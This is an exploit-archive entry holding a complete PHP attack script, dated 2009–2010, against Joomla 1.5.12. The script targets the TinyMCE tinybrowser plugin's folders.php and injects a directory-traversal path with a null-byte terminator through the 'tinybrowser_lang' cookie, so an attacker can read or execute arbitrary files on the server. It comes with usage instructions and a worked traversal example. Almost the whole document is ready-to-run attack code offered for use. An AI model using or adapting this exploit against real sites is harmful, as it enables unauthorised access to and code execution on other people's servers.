Joomla 1.5.12 read/exec remote files :

Date : 2010-01-26 Author : Nikoal Petrov
<?php
	/*
		Copyright (c) ITIX LTD

		This program is free software: you can redistribute it and/or modify
		it under the terms of the GNU General Public License as published by
		the Free Software Foundation, either version 3 of the License, or
		(at your option) any later version.

		This program is distributed in the hope that it will be useful,
		but WITHOUT ANY WARRANTY; without even the implied warranty of
		MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
		GNU General Public License for more details.

		You should have received a copy of the GNU General Public License
		along with this program.  If not, see <http://www.gnu.org/licenses/>.

		TITLE:		Joomla 1.5.12 read/exec remote files
		AUTHOR:		Nikola Petrov ([email protected])
		VERSION:	1.0
		LICENSE:	GNU General Public License

		Platform: Joomla 1.5.12
		Vulnerabilities discovery and implementation: Nikola Petrov ([email protected])
		Date: 27.08.2009
	*/
	
	print "

#########################################################################
";
	print "# LFI discovery and implementation: Nikola Petrov ([email protected])
";
	print "# Date: 27.08.2009
";
	print "#########################################################################

";

	if($argc < 4) {
		print "usage: php ". $argv[0] ." host path file [port] [debug]
";
		print "example: php ". $argv[0] ." localhost /j1512 ../../../../../../../../wamp/www/j1512/images/stories/duck.jpg 80 1
";
		exit();
	}
	
	$Host = $argv[1];
	$Path = $argv[2] . '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php';
	$File = $argv[3] . '%00';
	
	empty($argv[4]) ? $Port = 80 : $Port = $argv[4];
	empty($argv[5]) ? $Debug = 0 : $Debug = 1;

	function HttpSend($aHost, $aPort, $aPacket) {
		$Response = "";

		if(!$Socket = fsockopen($aHost, $aPort)) {
			print "Error connecting to $aHost:$aPort

";
			exit();
		}
		
		fputs($Socket, $aPacket);
		
		while(!feof($Socket)) $Response .= fread($Socket, 1024);
		
		fclose($Socket);
		
		return $Response;
	}
	
	$Packet  = "GET {$Path} HTTP/1.0
";
	$Packet .= "Host: {$Host}
";
	$Packet .= "Cookie: tinybrowser_lang={$File}
";
	$Packet .= "Connection: close

";
	
	if($Debug) {
		print "Request to '$Host:$Port':
";
		print $Packet;
	}
	
	print HttpSend($Host, $Port, $Packet);
?>

C1

 

C2

 

C3